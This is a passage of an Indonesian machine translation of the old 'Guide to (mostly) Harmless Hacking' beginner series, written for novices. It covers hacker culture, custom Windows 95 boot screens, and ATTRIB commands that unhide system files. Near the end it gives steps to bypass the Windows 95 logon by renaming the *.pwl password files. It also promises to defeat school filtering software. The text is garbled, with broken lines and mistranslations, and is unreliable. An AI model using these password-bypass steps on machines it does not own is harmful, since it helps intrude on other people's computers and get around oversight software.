Anda di halaman 1dari 180

Halaman 1

HACKING KE SISTEM KOMPUTER


Panduan Pemula
Panduan Seri Pemula:
Jadi Anda ingin menjadi peretas yang tidak berbahaya?
Meretas Windows 95!
Meretas ke dalam Windows 95 (dan sedikit pengetahuan NT)!
Peretasan dari Windows 3.x, 95 dan NT
Cara Mendapatkan * Akun Shell * Bagus *, Bagian 1
Cara Mendapatkan * Akun Shell * Bagus *, Bagian 2
Cara menggunakan Web untuk mencari informasi tentang peretasan.
Peretasan komputer. Di mana ia mulai dan bagaimana itu tumbuh?
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 1
Jadi Anda ingin menjadi peretas yang tidak berbahaya?
"Maksudmu kau bisa meretas tanpa melanggar hukum?"
Itu adalah suara seorang siswa baru sekolah menengah. Dia menelepon saya karena ayahnya baru saja mengambil
pergi komputernya. Pelanggarannya? Memecahkan akun Internet saya. Bocah itu berharap membuatku terkesan
bagaimana "kewl" dia. Tetapi sebelum saya menyadari bahwa dia telah masuk, seorang sysadmin di ISP saya telah melihat milik
anak itu
eksplorasi tidak berbahaya dan telah memperingatkan orang tua. Sekarang bocah itu ingin bantuanku untuk kembali ke jalur
telepon.
Saya memberi tahu anak itu bahwa saya bersimpati dengan ayahnya. Bagaimana jika sysadmin dan aku menjadi penggerutu
utama? Ini
anak bisa saja berakhir di tahanan remaja. Sekarang saya tidak setuju dengan menempatkan hacker yang tidak berbahaya di
penjara, dan
Saya tidak akan pernah bersaksi melawannya. Tetapi itulah yang dilakukan beberapa orang terhadap orang-orang yang mengintip
orang lain
akun komputer orang - bahkan ketika pelakunya tidak membahayakan. Bocah ini perlu belajar bagaimana caranya keluar
masalah!
Peretasan adalah gim paling menggembirakan di planet ini. Tapi itu berhenti menyenangkan ketika Anda berakhir di sel dengan
teman sekamar bernama "Spike." Tetapi peretasan tidak harus berarti melanggar hukum. Dalam seri Panduan ini kami mengajar
peretasan yang aman sehingga Anda tidak harus terus melihat ke belakang untuk mencari narasi dan polisi.
Yang kita bicarakan adalah peretasan sebagai rekreasi yang sehat, dan sebagai pendidikan gratis yang bisa membuat Anda
memenuhi syarat
dapatkan pekerjaan bergaji tinggi. Bahkan, banyak administrator sistem jaringan, ilmuwan komputer, dan komputer
pakar keamanan pertama-tama mempelajari profesi mereka, bukan di beberapa program perguruan tinggi, tetapi dari budaya
peretas.
Dan Anda mungkin terkejut menemukan bahwa pada akhirnya Internet dijaga bukan oleh penegak hukum
agen, bukan oleh perusahaan raksasa, tetapi oleh jaringan di seluruh dunia, ya, peretas.
Anda juga bisa menjadi salah satu dari kami.
Dan - peretasan bisa sangat mudah. Heck, jika saya bisa melakukannya, siapa pun bisa!
Terlepas dari mengapa Anda ingin menjadi seorang peretas, itu jelas merupakan cara untuk bersenang-senang, mengesankan
teman-teman Anda, dan mendapatkan
tanggal. Jika Anda seorang peretas wanita, Anda menjadi sangat menarik bagi para pria. Terima kata-kataku untuk itu!; ^ D

Halaman 2
Panduan untuk (kebanyakan) Peretasan Tidak Berbahaya ini dapat menjadi gerbang Anda ke dunia ini. Setelah membaca hanya
beberapa
Panduan ini Anda akan dapat melakukan aksi yang akan sah, phun, dan akan mengesankan heck keluar dari Anda
teman.
Panduan ini dapat memperlengkapi Anda untuk menjadi salah satu warga yang menjaga agar Internet tidak hancur
oleh orang jahat. Terutama spammer. Heh, heh, heh. Anda juga dapat belajar cara menjaga orang jahat dari
mengacaukan akun Internet, email, dan komputer pribadi Anda. Anda akan belajar untuk tidak takut pada konyol
tipuan yang pranksters gunakan untuk menjaga pengguna internet rata-rata dalam kegelisahan.
Jika Anda bertahan bersama kami selama setahun atau lebih, Anda dapat belajar cukup banyak dan bertemu orang-orang di daftar
email kami dan
Saluran IRC yang dapat membantu Anda untuk menjadi benar-benar elit.
Namun, sebelum Anda terjun ke subkultur hacker, bersiaplah untuk sikap hacker itu. Anda telah
diperingatkan.
Jadi ... selamat datang di petualangan peretasan!
APA YANG HARUS SAYA BUTUHKAN UNTUK MEMERIKSA?
Anda mungkin bertanya-tanya apakah peretas membutuhkan peralatan komputer yang mahal dan rak yang penuh dengan
petunjuk teknis.
Jawabannya adalah tidak! Meretas bisa sangat mudah! Lebih baik lagi, jika Anda tahu cara mencari di Web, Anda
dapat menemukan hampir semua informasi komputer yang Anda butuhkan secara gratis.
Sebenarnya, peretasan sangat mudah sehingga jika Anda memiliki layanan online dan tahu cara mengirim dan membaca email,
Anda bisa
mulai peretasan segera. Seri # 2 GTMHH Beginners 'akan menunjukkan tempat Anda dapat mengunduh
program ramah-hacker khusus untuk Windows yang benar-benar gratis. Dan kami akan menunjukkannya dengan mudah
Anda bisa menggunakannya untuk trik-trik hacker.
Sekarang anggaplah Anda ingin menjadi hacker elit? Yang Anda perlukan hanyalah "akun shell" yang murah
dengan Penyedia Layanan Internet. Di GTMHH Beginners 'Series # 3 kami akan memberi tahu Anda cara mendapatkan shell
akun, masuk, dan mulai mainkan game terhebat di Bumi: Unix hacking! Kemudian di Vol.s I, II, dan III dari
GTMHH Anda bisa masuk ke peretasan Unix dengan serius.
Anda bahkan dapat membuatnya menjadi jajaran para Uberhackers tanpa memuat komputer yang mahal
peralatan. Dalam Vol. Saya akan memperkenalkan Linux, sistem operasi ramah-hacker yang gratis. Itu bahkan akan berjalan
pada 386
PC hanya dengan 2 Mb RAM! Linux sangat baik sehingga banyak Penyedia Layanan Internet menggunakannya untuk
menjalankan sistem mereka.
Dalam Vol. III kami juga akan memperkenalkan Perl, bahasa pemrograman shell yang dicintai Uberhackers. Kami akan bahkan
mengajarkan beberapa "eksploitasi" peretas yang mematikan yang berjalan di Perl menggunakan Linux. Oke, Anda bisa
menggunakan sebagian besar dari ini
eksploitasi untuk melakukan hal-hal ilegal. Tetapi mereka hanya ilegal jika Anda menjalankannya terhadap komputer orang lain
tanpa izin mereka. Anda dapat menjalankan program apa pun dalam seri Panduan ini di komputer Anda sendiri, atau
(Menyetujui) komputer teman - jika Anda berani! Hei, serius, sebenarnya tidak ada dalam seri Panduan ini
melukai komputer Anda, kecuali jika Anda memutuskan untuk membuangnya dengan sengaja.
Kami juga akan membuka pintu gerbang ke bawah tanah yang menakjubkan di mana Anda dapat tetap di atas hampir setiap
penemuan kelemahan keamanan komputer. Anda dapat mempelajari cara memanfaatkannya - atau mempertahankan komputer
Anda
melawan mereka!
Tentang Panduan untuk (kebanyakan) Peretasan Tidak Berbahaya
Kami telah memperhatikan bahwa ada banyak buku yang mengagungkan para peretas. Untuk membaca buku-buku ini Anda akan
berpikir
bahwa butuh bertahun-tahun kerja cemerlang untuk menjadi satu. Tentu saja kami, peretas suka melestarikan mitos ini
karena itu membuat kami terlihat sangat kewl.

Halaman 3
Tetapi berapa banyak buku di luar sana yang memberi tahu para pemula langkah demi langkah bagaimana sebenarnya melakukan
peretasan ini?
Tidak ada! Serius, pernahkah Anda membaca _Sekretaris Superhacker_ oleh The Knightmare (Loomponics, 1994) atau
Rahasia Rahasia Legion of Doom Hacker oleh Salacious Crumb (St. Mahoun Books, 1994)? Mereka
penuh dengan tidak jelas dan ketinggalan zaman. Beri aku istirahat.
Dan jika Anda masuk ke salah satu grup berita peretas di Internet dan bertanya kepada orang-orang bagaimana cara
melakukannya, beberapa diantaranya
mereka menghina dan mengejekmu. Oke, mereka semua mengolok-olok Anda.
Kami melihat banyak peretas membuat masalah besar pada diri mereka sendiri dan menjadi misterius dan menolak untuk
membantu orang lain
pelajari cara meretas. Mengapa? Karena mereka tidak ingin Anda tahu yang sebenarnya, itulah yang sebagian besar dari mereka
lakukan benar-benar sangat sederhana!
Yah, kami memikirkan hal ini. Kita juga bisa menikmati kesenangan orang-orang yang menghina yang meminta kita cara
meretas.
Atau kita bisa mendapatkan ego besar dengan mengajari ribuan orang cara meretas. Muhahaha.
Cara Menggunakan Panduan untuk (kebanyakan) Hacking Tidak Berbahaya
Jika Anda tahu cara menggunakan komputer pribadi dan ada di Internet, Anda sudah cukup tahu untuk memulai
belajar menjadi seorang hacker. Anda bahkan tidak perlu membaca setiap Panduan untuk (kebanyakan) Melakukan Peretasan
Tidak Berbahaya
Untuk menjadi seorang hacker.
Anda dapat mengandalkan apa saja dalam Volume I, II dan III yang sangat mudah sehingga Anda dapat melompat ke mana saja
dan
cukup ikuti instruksi.
Tetapi jika rencana Anda adalah untuk menjadi "elit," Anda akan lebih baik jika Anda membaca semua Panduan, lihat banyak
Web
situs dan newsgroup yang kami tunjukkan kepada Anda, dan temukan mentor di antara banyak peretas berbakat yang
posting ke forum Peretas kami atau mengobrol di server IRC kami di http://www.infowar.com, dan di Happy Hacker
daftar email (email hacker@techbroker.com dengan pesan "berlangganan").
Jika tujuan Anda adalah menjadi Uberhacker, Panduan akan berakhir menjadi yang pertama dalam segunung materi
Anda perlu belajar. Namun, kami menawarkan strategi belajar yang dapat membantu Anda dalam pencarian Anda untuk
mencapai
puncak peretasan.
Bagaimana Agar Tidak Rusak
Satu masalah kecil dengan peretasan adalah bahwa jika Anda melewati batas, Anda bisa masuk penjara. Kami akan melakukan
yang terbaik untuk itu
memperingatkan Anda ketika kami menjelaskan peretasan yang dapat membuat Anda bermasalah dengan hukum. Tapi kami
bukan pengacara atau
ahli tentang cyberlaw. Selain itu, setiap negara bagian dan setiap negara memiliki hukumnya sendiri. Dan hukum-hukum ini terus
berlanjut
berubah. Jadi, Anda harus menggunakan sedikit akal.
Namun, kami memiliki Panduan untuk (kebanyakan) Seri Hukum Kejahatan Komputer Peretasan Tidak Berbahaya untuk
membantu Anda menghindari
beberapa jebakan.
Tetapi perlindungan terbaik agar tidak tertangkap adalah Peraturan Emas. Jika Anda akan melakukan sesuatu yang Anda
tidak ingin melakukan untuk Anda, lupakan saja. Lakukan peretasan yang membuat dunia menjadi tempat yang lebih baik, atau
setidaknya itu
menyenangkan dan tidak berbahaya, dan Anda harus dapat menghindari masalah.
Jadi, jika Anda mendapatkan ide dari Panduan ke (kebanyakan) Peretasan Tidak Berbahaya yang membantu Anda melakukan
sesuatu
jahat atau merusak, itu masalah Anda jika Anda akhirnya menjadi peretas berikutnya di balik jeruji besi. Hei, hukum
tidak akan peduli jika orang yang komputernya Anda buang adalah iklan ***. Itu tidak akan peduli bahwa perusahaan raksasa
yang databasenya Anda masukkan sekali sobat terbaik Anda. Mereka hanya akan peduli bahwa Anda melanggar hukum.

Halaman 4
Bagi sebagian orang mungkin terdengar seperti phun untuk menjadi sensasi nasional dalam histeria terbaru atas Kejahatan
Peretas jenius. Tetapi setelah persidangan, ketika beberapa pembaca dari Panduan ini akhirnya menjadi "pacar" yang enggan
dari seorang terpidana bernama Spike, seberapa bahagia kliping berita itu membuatnya?
Konvensi yang Digunakan dalam Panduan
Anda mungkin sudah memperhatikan bahwa kami mengeja beberapa kata lucu, seperti "kewl" dan "phun." Ini adalah hacker
istilah slang. Karena kami sering berkomunikasi satu sama lain melalui email, sebagian besar gaul kami terdiri dari biasa
kata-kata dengan ejaan yang luar biasa. Sebagai contoh, seorang hacker dapat mengeja "elit" sebagai "3l1t3," dengan 3 yang
menggantikan
untuk e dan 1 untuk i. Ia bahkan bisa mengeja "elit" sebagai "31337. Pemandu terkadang menggunakan bahasa gaul ini
ejaan untuk membantu Anda mempelajari cara menulis email seperti seorang peretas.
Tentu saja, ejaan lucu yang kita gunakan akan cepat keluar dari tanggal. Jadi kami tidak menjamin jika Anda menggunakannya
gaul ini, orang akan membaca email Anda dan berpikir, "Ohhh, Anda pasti Genius Jahat! Saya sangat terkesan!"
Ambillah dari kami, orang-orang yang perlu terus menciptakan bahasa gaul baru untuk membuktikan bahwa mereka "k-rad
3l1t3" sering
lusers dan lamers. Jadi, jika Anda tidak ingin menggunakan bahasa gaul peretas dari Panduan ini, tidak masalah bagi kami.
Kebanyakan Uberhackers tidak menggunakan bahasa gaul.
Kamu siapa?
Kami telah membuat beberapa asumsi tentang siapa Anda dan mengapa Anda membaca Panduan ini:
· Anda memiliki PC atau komputer pribadi Macintosh
· Anda online dengan internet
· Anda memiliki selera humor dan petualangan dan ingin mengekspresikannya dengan meretas
· Atau - Anda ingin mengesankan teman-teman Anda dan mengambil anak-anak ayam (atau lelaki) dengan membuat mereka
berpikir Anda adalah seorang Jahat
Jenius
Jadi, apakah gambar ini cocok untuk Anda? Jika demikian, OK, d00dz, mulai komputer Anda. Apakah Anda siap untuk meretas?

Halaman 5
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 2, Bagian Satu.
Meretas Windows 95!
____________________________________________________________
Peringatan penting: ini adalah pelajaran pemula. PEMULA. Apakah Anda semua yang super k-rad haxors elit di luar sana
lewati saja membaca yang ini, bukannya membacanya dan merasa terhina betapa mudahnya dan kemudian mengirim email
kepada saya
bleat "Ini GTMHH iz 2 ezy your ****** up, wee hate u !!! & $%" Pergi belajar sesuatu yang serius
menantang kecerdasan Anda seperti "Unix for Dummies," OK?
Pernahkah Anda melihat apa yang terjadi ketika seseorang dengan akun America Online memposting ke berita hacker
grup, daftar email, atau sesi obrolan IRC? Ini memberi Anda pemahaman yang benar tentang apa arti "nyala", kan?
Sekarang Anda mungkin berpikir bahwa mengolok-olok dumb.newbie@aol.com hanyalah beberapa prasangka. Agak seperti
bagaimana
para manajer di perusahaan-perusahaan besar tidak mengenakan rambut gimbal dan anak laki-laki yang bersaudara tidak
mengendarai Yugos.
Tapi alasan sebenarnya peretas serius tidak akan pernah menggunakan AOL adalah karena ia tidak menawarkan akun shell Unix
untuk itu
pengguna. AOL takut Unix karena itu adalah sistem operasi yang paling luar biasa, menarik, kuat, ramah-hacker
di tata surya ... harus tenang ... bagaimanapun, aku akan merasa lumpuh tanpa Unix. Jadi AOL menawarkan angka
Akun Unix shell untuk penggunanya memohon untuk diretas.
Sayangnya, sikap ini menyebar. Setiap hari semakin banyak ISP yang memutuskan untuk berhenti menawarkan akun shell
kepada pengguna mereka.
Tetapi jika Anda tidak memiliki akun shell Unix, Anda masih bisa meretas. Yang Anda butuhkan hanyalah komputer yang
menjalankan Windows
95 dan hanya beberapa akun on-line yang benar-benar terbelakang seperti America Online atau Compuserve.
Dalam Beginner's Series # 2 ini kami membahas beberapa hal menyenangkan yang harus dilakukan dengan Windows dan bahkan
yang paling hacker
Layanan online yang tidak bersahabat. Dan, ingat, semua hal ini sangat mudah. Anda tidak perlu menjadi jenius. Kamu
tidak perlu menjadi ilmuwan komputer. Anda tidak perlu memenangkan komputer yang mahal. Ini adalah hal-hal
siapa pun dengan Windows 95 dapat melakukannya.
Bagian Satu: Kustomisasi visual Windows 95 Anda. Siapkan layar pengaktifan, latar belakang, dan masuk begitu saja
untuk memukau dan membingungkan teman-teman non-hacker Anda.
Bagian Dua: Turunkan program pengasuh Windows seperti Surfwatch dan pengaturan yang digunakan banyak sekolah di
Internet
berharap menjaga anak-anak dari menggunakan program yang tidak sah. Buktikan pada diri sendiri - dan teman Anda dan
rekan kerja - bahwa kata sandi Windows 95 adalah lelucon.
Bagian Tiga: Jelajahi komputer lain - OK, mari kita terang-terangan - hack - dari komputer rumah Windows Anda
menggunakan bahkan hanya AOL untuk akses Internet.
CARA MENYESUAIKAN WINDOWS 95 VISUAL
OK, katakanlah Anda mengadakan pesta liar di rumah Anda. Anda memutuskan untuk menunjukkan kepada teman Anda bahwa
Anda adalah satu
dari mereka yang takut hacker d00dz. Jadi Anda menyalakan komputer Anda dan apa yang harus muncul di layar Anda tetapi
logo untuk "Windows 95." Tampak agak timpang, bukan? Komputer Anda terlihat seperti kotak milik orang lain.
Sama seperti beberapa stasiun kerja perusahaan yang membosankan yang dioperasikan oleh seorang pria dengan IQ di tahun 80-
an.
Sekarang jika Anda seorang peretas serius, Anda akan menjalankan Linux atau FreeBSD atau semacam Unix lainnya
komputer pribadi Anda. Tapi temanmu tidak tahu itu. Jadi, Anda memiliki kesempatan untuk insinyur sosial
mereka berpikir Anda sangat elit hanya dengan menyesuaikan layar boot Anda.

Halaman 6
Sekarang katakanlah Anda ingin boot dengan layar hitam dengan api oranye dan kuning dan slogan "K-
Rad Doomsters of the Apocalypse. "Ini ternyata sangat mudah.
Sekarang Microsoft ingin Anda mengiklankan sistem operasi mereka setiap kali Anda boot. Padahal, mereka mau
ini sangat buruk sehingga mereka pergi ke pengadilan untuk mencoba memaksa pengecer komputer untuk menjaga boot Micro $
oft
layar pada sistem yang dijual vendor ini.
Jadi Microsoft tentu tidak ingin Anda mengacaukan layar boot-nya. Jadi M $ telah mencoba bersembunyi
perangkat lunak layar bootup. Tapi mereka tidak menyembunyikannya dengan baik. Kita akan belajar hari ini bagaimana
melakukannya secara total
menggagalkan rencana mereka.
*********************************************
Kiat Genius Jahat: Salah satu hal yang bermanfaat tentang peretasan adalah menemukan file tersembunyi yang mencoba
menghindarkan Anda
memodifikasi mereka - dan kemudian mengacaukannya. Itulah yang kami lakukan hari ini.
Grafik booting Win95 disembunyikan dalam file bernama c: \ logo.sys dan / atau ip.sys. Untuk melihat file ini, buka
Manajer File, klik "lihat", lalu klik "menurut jenis file," lalu centang kotak "tampilkan file sistem / tersembunyi."
Kemudian, kembali pada "lihat," klik "semua detail file." Di sebelah kanan file logo.sys Anda akan melihat huruf "rhs."
Ini berarti file ini "read-only, hidden, system."
Alasan mengapa file grafis yang tidak berbahaya ini dilabeli sebagai file sistem - padahal sebenarnya hanya file grafik
beberapa animasi ditambahkan - adalah karena Microsoft takut Anda akan mengubahnya untuk membaca sesuatu seperti
"Selamat datang di
Windoze 95 - Sarapan Lusers! "Jadi dengan menjadikannya file read-only, dan menyembunyikannya, dan menyebutnya file
sistem
seolah-olah itu adalah sesuatu yang sangat penting itu akan menghancurkan komputer Anda jika Anda mengacaukannya,
Microsoft mencoba menipu Anda untuk membiarkannya.
*********************************************
Cara termudah untuk menggagalkan startup Windoze 95 ini dan mematikan layar adalah dengan membuka
http://www.windows95.com/apps/ dan periksa program mereka. Tapi kami adalah peretas, jadi kami suka melakukan sesuatu
diri. Jadi, inilah cara melakukannya tanpa menggunakan program kalengan.
Kami mulai dengan menemukan program MSPaint. Mungkin di bawah folder asesoris. Tapi kalau-kalau Anda
seperti saya dan terus bergerak di sekitar, inilah rutin menemukan program yang gagal-aman:
1) Klik "Mulai" di sudut kiri bawah layar Anda.
2) Klik "Windows Explorer"
3) Klik "Alat"
4) Klik "Temukan"
5) Klik "file atau folder"
6) Setelah "bernama" ketik "MSPaint"
7) Setelah "Lihat", ketikkan 'C: "
8) Centang kotak yang mengatakan "termasuk subfolder"
9) Klik "temukan sekarang"
10) Klik dua kali pada ikon ember cat yang muncul di jendela. Ini memuat program cat.
11) Di dalam program cat, klik "file"
12) Klik "buka"
OK, sekarang Anda memiliki MSPaint. Sekarang Anda memiliki cara super mudah untuk membuat layar boot baru Anda:
13) Setelah "nama file" ketikkan c: \ windows \ logos.sys. Ini memunculkan grafik yang Anda dapatkan saat komputer Anda
siap untuk mematikan dengan mengatakan "Sekarang aman untuk mematikan komputer Anda." Grafik ini persis tepat
format yang akan digunakan untuk grafik startup Anda. Jadi Anda bisa bermain dengannya sesuka Anda (asalkan tidak
lakukan apa saja di layar Atribut di bawah menu Gambar) dan gunakan untuk grafik startup Anda.

Halaman 7
14) Sekarang kita bermain dengan gambar ini. Cukup bereksperimen dengan kontrol MSPaint dan coba hal-hal menyenangkan.
15) Ketika Anda memutuskan bahwa Anda benar-benar menyukai gambar Anda (isi dengan peretas yang menakutkan, bukan?),
Simpan sebagai
c: \ logo.sys. Ini akan menimpa file logo startup Windows. Mulai sekarang, kapan saja Anda ingin berubah
logo startup Anda, Anda dapat membaca dan menulis file logo.sys.
16. Jika Anda ingin mengubah layar mati, mereka mudah ditemukan dan dimodifikasi menggunakan MSPaint. Itu
layar mulai shutdown bernama c: \ windows \ logow.sys. Seperti yang kita lihat di atas, final "Sekarang aman untuk
matikan komputer Anda "layar grafis bernama c: \ windows \ logos.sys.
17. Untuk membuat gambar yang akan tersedia untuk wallpaper Anda, beri nama seperti itu
c: \ windows \ evilhaxor.bmp (mengganti nama file Anda dengan "exilhaxor" - kecuali jika Anda ingin memberi nama
wallpaper "evilhaxor.")
************************************************ ******
Kiat Genius Jahat: Layar pembuka Microsoft Windows 95 memiliki bilah animasi di bagian bawah. Tapi begitu kamu
ganti dengan gambar Anda sendiri, animasi itu hilang. Namun, Anda dapat membuat startup animasi Anda sendiri
layar menggunakan program shareware BMP Wizard. Beberapa situs unduhan untuk barang ini termasuk:
http://www.pippin.com/English/ComputersSoftware/Software/Windows95/graphic.htm
http://search.windows95.com/apps/editors.html
http://www.windows95.com/apps/editors.html
Atau Anda dapat mengunduh program LogoMania, yang secara otomatis mengubah ukuran bitmap ke ukuran yang benar
layar masuk dan keluar dan tambahkan beberapa jenis animasi juga. Anda dapat menemukannya di
ftp.zdnet.com/pcmag/1997/0325/logoma.zip
************************************************ ******
Sekarang masalah dengan menggunakan salah satu file logo Win95 yang ada adalah bahwa mereka hanya memungkinkan Anda
untuk menggunakannya
warna asli. Jika Anda benar-benar ingin menjadi liar, buka MSPaint lagi. Pertama klik "Gambar," lalu klik "atribut."
Atur lebar 320 dan tinggi menjadi 400. Pastikan di bawah Unit bahwa Pels dipilih. Sekarang Anda bebas menggunakan apa pun
kombinasi warna tersedia dalam program ini. Ingatlah untuk menyimpan file sebagai c: \ logo.sys untuk logo startup Anda,
atau c: \ windows \ logow.sys dan atau c: \ windows \ logos.sys untuk layar shutdown Anda.
Tetapi jika Anda menginginkan beberapa hal yang benar-benar luar biasa untuk layar awal Anda, Anda dapat mencuri gambar
dari favorit Anda
halaman hacker di Web dan mengimpornya ke layar startup dan shutdown Win95. Begini caranya.
1) Wow, grafis kewl! Hentikan penjelajahan Anda di halaman Web itu dan tekan tombol "print screen".
2) Buka MSPaint dan atur lebar ke 320 dan tinggi menjadi 400 dengan unit Pels.
3) Klik edit, lalu klik tempel. Bam, gambar itu sekarang ada di program MSPaint Anda.
4) Saat Anda menyimpannya, pastikan atributnya masih 320X400 Pels. Beri nama itu c: \ logo.sys, c: \ windows \ logow.sys,
c: \ windows \ logos.sys, atau c: \ winodws \ evilhaxor.bmp tergantung pada layar atau wallpaper yang Anda inginkan
tampilkan di.
Tentu saja Anda dapat melakukan hal yang sama dengan membuka file grafik yang Anda pilih di MSPaint atau yang lainnya
program grafis, selama Anda menyimpannya dengan nama file yang tepat di direktori yang tepat dan ukurannya 320X400
Pels.
Oh, tidak, Bibi Suzie yang pengap datang berkunjung dan dia ingin menggunakan komputer saya untuk membaca emailnya! Saya
tidak akan pernah
dengar akhirnya jika dia melihat K-Rad Doomsters saya dari layar startup Apocalypse !!!

Halaman 8
Inilah yang dapat Anda lakukan untuk mendapatkan kembali logo startup Micro $ Anda yang membosankan. Cukup ganti nama
c: logo.sys
untuk sesuatu yang tidak berbahaya yang tidak akan dilihat Bibi Suzie sambil mengintip file manager. Sesuatu seperti
logo.bak. Coba tebak apa yang terjadi? Orang-orang Microsoft itu mengira kami akan melakukan hal-hal seperti ini dan
menyembunyikan salinannya
dari layar boot membosankan mereka dalam file bernama "io.sys." Jadi jika Anda mengganti nama atau menghapus logo.sys
aslinya, dan
tidak ada file dengan nama yang tersisa, saat boot komputer Anda menampilkan boot Windows 95 lama yang sama
layar.
Sekarang misalkan kotak Win95 Anda terpasang ke jaringan area lokal (LAN)? Tidak mudah mengubah milik Anda
logo bootup, karena jaringan dapat mengesampingkan perubahan Anda. Tetapi ada cara untuk menggagalkan jaringan. Jika kamu
tidak takut atasan Anda melihat "K-Rad Dommsters of the Apocalypse" Anda terkena x-rated
latar belakang, inilah cara menyesuaikan grafik booting Anda.
Editor kebijakan 0,95
(datang pada 95 cd) dengan admin.adm default akan membiarkan Anda berubah
ini. Gunakan editor kebijakan untuk membuka registri, pilih 'lokal
komputer 'pilih jaringan, pilih' masuk 'dan kemudian selet' masuk banner '.
Ini kemudian akan menunjukkan kepada Anda banner saat ini dan membiarkan Anda mengubahnya dan menyimpannya
kembali ke registry.
************************************
Kiat jenius jahat: Ingin mengacaukan io.sys atau logo.sys? Begini cara masuk ke mereka. Dan, coba tebak, ini
hal yang bagus untuk dipelajari jika Anda perlu membobol komputer Windows - sesuatu yang akan kita bahas
detail di bagian selanjutnya.
Klik "Mulai" lalu "Program" lalu "MS-DOS." Pada MS_DOS prompt masukkan perintah:
ATTRIB -R -H -SC: \ IO.SYS
ATTRIB -R -H -SC: \ LOGO.SYS
Sekarang mereka sepenuhnya di tanganmu, muhahaha!
Tapi jangan heran MSPaint tidak bisa membuka file-file ini. MSPaint hanya membuka file grafik. Tapi
io.sys dan logo.sys diatur untuk digunakan oleh aplikasi animasi.
************************************
OK, itu saja untuk sekarang. Anda 31.337 peretas yang merasa dihina dengan membaca ini karena terlalu mudah,
kue yang sulit. Aku sudah memperingatkanmu. Tetapi saya berani bertaruh bahwa kotak saya memiliki grafik login hacker yang
lebih bahagia daripada milik Anda. K-Rad
Kiamat dari kiamat, ya!

Halaman 9
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 2, Bagian Dua.
Meretas ke dalam Windows 95 (dan sedikit pengetahuan NT)!
____________________________________________________________
Peringatan penting: ini adalah pelajaran pemula. PEMULA. Akankah Anda semua jenius yang sudah lahir
mengetahui Windows 32-bit lewati saja membaca yang ini, oke? Kami tidak perlu mendengar betapa jijiknya Anda itu
tidak semua orang sudah tahu ini.
DISCRETION PARENTAL DISARANKAN!
Pelajaran ini akan meletakkan dasar untuk mempelajari cara meretas apa yang sekarang paling sering dipasang
sistem operasi workstation: Windows NT. Bahkan, Windows NT mulai digunakan secara luas sebagai area lokal
jaringan (LAN), Internet, intranet, dan server Web. Jadi, jika Anda ingin menyebut diri Anda seorang peretas serius, Anda akan
melakukannya
lebih baik mendapatkan pemahaman yang kuat tentang Win NT.
Dalam pelajaran ini Anda akan mempelajari teknik peretasan serius yang berguna pada sistem Windows 95 dan Win NT
saat bermain dengan aman di komputer Anda sendiri.
Dalam pelajaran ini kita mengeksplorasi:
· Beberapa cara untuk meretas kata sandi Windows 95 Anda
· Cara meretas kata sandi Pentium CMOS Anda
· Cara meretas Windows Registry - yang merupakan tempat kontrol akses pada LAN berbasis Windows, intranet
dan server Internet dan Web disembunyikan!
Mari kita mengatur panggung untuk pelajaran ini. Anda memiliki teman Anda ke rumah Anda untuk melihat Anda meretas pada
Anda
Kotak Windows 95. Anda sudah memasukkan layar bootup yang benar-benar terlihat seperti industri, jadi sudah
gemetar memikirkan betapa eloknya dirimu. Jadi apa yang akan kamu lakukan selanjutnya?
Bagaimana dengan mengklik "Mulai," mengklik "pengaturan" lalu "panel kontrol" lalu "kata sandi." Beri tahu temanmu
kata sandi Anda dan minta mereka memasukkan rahasia baru. Kemudian matikan komputer Anda dan beri tahu mereka
akan menunjukkan kepada mereka seberapa cepat Anda dapat memecahkan kata sandi mereka dan kembali ke kotak Anda
sendiri!
Prestasi ini sangat mudah, saya hampir malu untuk memberi tahu Anda bagaimana melakukannya. Itu karena kamu akan berkata
"Sheesh, kamu
sebut itu proteksi kata sandi? Orang idiot mana pun dapat membobol kotak Win 95! Dan tentu saja Anda benar. Tapi itu
cara Mikro $ sering. Ingatlah ini lain kali Anda berharap untuk menjaga sesuatu di kotak Win95 Anda rahasia.
Dan ketika tiba saatnya untuk belajar Win NT hacking, ingatlah pola pikir keamanan Micro $ ini. Lucu
masalahnya adalah sangat sedikit peretas yang mengacaukan NT hari ini karena mereka semua sibuk membobol kotak Unix. Tapi
ada eksploitasi Win NT yang tak terhitung jumlahnya hanya menunggu untuk ditemukan. Setelah Anda melihat betapa mudahnya
melakukannya
masuk ke kotak Win 95 Anda, Anda akan merasakan di tulang Anda bahwa bahkan tanpa kami memegang tangan Anda, Anda
bisa
temukan cara untuk memecahkan kotak Win NT juga.
Tapi kembalilah ke teman-temanmu menunggu untuk melihat apa itu hacker elit. Mungkin Anda ingin mereka mengubahnya
punggung jadi yang mereka tahu adalah Anda dapat membobol kotak Win95 dalam waktu kurang dari satu menit. Atau mungkin
Anda akan bersikap baik
pria dan tunjukkan pada mereka bagaimana itu dilakukan.
Tapi pertama-tama, ini peringatan. Beberapa teknik pertama yang kami tampilkan berfungsi pada sebagian besar instalasi Win 95
di rumah.
Tapi, terutama di jaringan area lokal perusahaan (LAN), beberapa teknik ini tidak berfungsi. Tapi tidak pernah
takut, dalam pelajaran ini kita akan membahas cara-cara yang cukup untuk menerobos masuk sehingga Anda akan dapat
mengendalikan sepenuhnya
* apa saja * Menangkan kotak 95 di mana Anda memiliki akses fisik. Tapi kita akan mulai dengan cara mudah dulu.

Halaman 10
Easy Win 95 Breakin # 1:
Langkah satu: boot komputer Anda.
Langkah dua: Ketika layar "konfigurasi sistem" muncul, tekan tombol "F5". Jika sistem Anda tidak
perlihatkan layar ini, teruslah menekan tombol F5.
Jika Win 95 Anda memiliki pengaturan yang tepat, ini mem-boot Anda ke "safe mode." Semuanya terlihat aneh, tetapi Anda
tidak perlu memberikan kata sandi Anda dan Anda masih dapat menjalankan program Anda.
Terlalu mudah! OK, jika Anda ingin melakukan sesuatu yang terlihat sedikit berkelas, inilah cara lain untuk menghindarinya
kata sandi.
Easy Win 95 Breakin # 2:
Langkah satu: Boot.
Langkah dua: ketika Anda sampai ke layar "konfigurasi sistem", tekan tombol F8. Ini memberi Anda
Menu Startup Microsoft Windows 95.
Langkah tiga: pilih nomor 7. Ini menempatkan Anda ke dalam MS-DOS. Pada prompt, beri perintah "rename
c: \ windows \ * pwl c: \ windows \ * zzz. "
****************************
Catatan pemula: MS-DOS singkatan dari Microsoft Disk Operating System, sistem operasi kuno yang berkencan
